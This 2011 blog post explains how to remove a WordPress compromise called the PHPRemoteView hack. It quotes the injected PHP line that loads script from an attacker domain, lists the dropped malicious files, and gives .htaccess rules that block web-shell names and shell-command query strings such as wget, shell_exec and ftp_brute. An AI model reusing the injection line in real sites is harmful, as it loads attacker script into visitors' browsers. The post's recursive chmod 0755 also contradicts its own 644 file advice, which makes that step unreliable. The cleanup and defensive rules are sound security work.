PHPRemoteView Hack: What it is, and how to remove it

Aug 7, 2011 by

PHPRemoteView
(image courtesy tbogard.com)

What is the PHPRemoteView hack? The PHPRemoteView hack is a WordPress hack initiated by hackers gaining write access to your WordPress directory. I myself did not take an image of it, but was dumb enough to fall for it. What it did was it would show an HTTP authentication-like alert upon launching the WordPress administration directory and entering your username and password would show a message linking to a page in another language.

Normally, I do not fall for hacks, but I fell for this and I was pretty disappointed.

I learned that this hack was caused by a security vulnerability in timthumb.php (a thumbnail fetching script) and I was susceptible because I did not update my timthumb.php.

I scoured the Internet and finally found a fix.

First, in your WordPress’s index.php, remove the following script added by the hack:

echo '<script type="text/javascript" language="javascript" src="http://superpuperdomain.com/count.php?ref='.urlencode($_SERVER['HTTP_REFERER']) .'"></script>';

(Note that the script could also be run from superpuperdomain2.com.)

Then remove six (check back often) phony files added by the hackers (back up first, in case your installation actually requires these files):

/wp-admin/js/config.php
/wp-admin/common.php
/wp-admin/udp.php
/wp-content/udp.php
/wp-content/uploads/feed-file.php
/wp-content/uploads/feed-files.php

Do not try to open any of these files, as my antivirus sounded alarms immediately.

I learned my lesson, and upon purging TechSpheria of this hack, I changed about twenty passwords.

To increase your site’s security, make sure you have correct permissions for files and directories.

Folder permissions for all of my WordPress installations are 755 whereas file permissions are 644.

Run this bash command to set the correct permissions recursively for your WordPress installation:

chmod -R 0755 /wordpressdirectory

I also added this rule in my .htaccess (in my account’s root folder, not inside public_html):

order allow,deny
deny from 91.220
deny from 91.196
deny from superpuperdomain.com
deny from superpuperdomain2.com
allow from all

The malicious script was run from superpuperdomain.com (UPDATE: superpuperdomain2.com has popped up) and I had run a traceroute on the domains, and found its servers’ IP addresses. To be safe, I blocked all the IPs in their range (91.220 and 91.196) and they would receive a forbidden notice if they tried to access TechSpheria again.

Benoist Rousseau posted additional .htaccess security; use at your own risk:

RewriteCond %{REQUEST_URI} .*((php|my)?shell|remview.*|phpremoteview.*|sshphp.*|pcom|nstview.*|c99|r57|webadmin.*|phpget.*|phpwriter.*|fileditor.*|locus7.*|storm7.*)\.(p?s?x?htm?l?|txt|aspx?|cfml?|cgi|pl|php[3-9]{0,1}|jsp?|sql|xml) [NC,OR]
RewriteCond %{REQUEST_METHOD} (GET|POST) [NC]
RewriteCond %{QUERY_STRING} ^(.*)=/home/(.*)$ [OR]
RewriteCond %{QUERY_STRING} ^work_dir=.*$ [OR]
RewriteCond %{QUERY_STRING} ^command=.*&output.*$ [OR]
RewriteCond %{QUERY_STRING} ^nts_[a-z0-9_]{0,10}=.*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)cmd=.*$ [OR] ## ATTENTION A CETTE REGLE. ELLE PEUT CASSER VOTRE SITE ##
RewriteCond %{QUERY_STRING} ^c=(t|setup|codes)$ [OR]
RewriteCond %{QUERY_STRING} ^act=((about|cmd|selfremove|chbd|trojan|backc|massbrowsersploit|exploits|grablogins|upload.*)|((chmod|f)&f=.*))$ [OR]
RewriteCond %{QUERY_STRING} ^act=(ls|search|fsbuff|encoder|tools|processes|ftpquickbrute|security|sql|eval|update|feedback|cmd|gofile|mkfile)&d=.*$ [OR]
RewriteCond %{QUERY_STRING} ^&?c=(l?v?i?&d=|v&fnot=|setup&ref=|l&r=|d&d=|tree&d|t&d=|e&d=|i&d=|codes|md5crack).*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)([-_a-z]{1,15})=(ls|cd|cat|rm|mv|vim|chmod|chdir|mkdir|rmdir|pwd|clear|whoami|uname|tar|zip|unzip|tar|gzip|gunzip|grep|more|ln|umask|telnet|ssh|ftp|head|tail|which|mkmode|touch|logname|edit_file|search_text|find_text|php_eval|download_file|ftp_file_down|ftp_file_up|ftp_brute|mail_file|mysql|mysql_dump|db_query)([^a-zA-Z0-9].+)*$ [OR]
RewriteCond %{QUERY_STRING} ^(.*)(wget|shell_exec|passthru|system|exec|popen|proc_open)(.*)$
RewriteRule (.*) – [F]

Remember to keep your plugins and code updated, and use different passwords for all your sites; keeping a secure WordPress installation is vital to everything.

(via T. Bogard and Benoist Rousseau)

UPDATE 1:
Added /wp-content/udp.php to the list of malicious files.

UPDATE 2:
/wp-content/udp.php can also be located in /wp-admin/udp.php. Check both /wp-content/ and /wp-admin/ for udp.php.

UPDATE 3:
Both /wp-content/udp.php and /wp-admin/udp.php are present and malicious. Remove them both.

UPDATE 4:
Added two files: /wp-content/uploads/feed-file.php and /wp-content/uploads/feed-files.php to the list.

UPDATE 5:
Added 91.196 to the deny IP list since superpuperdomain2.com has popped up.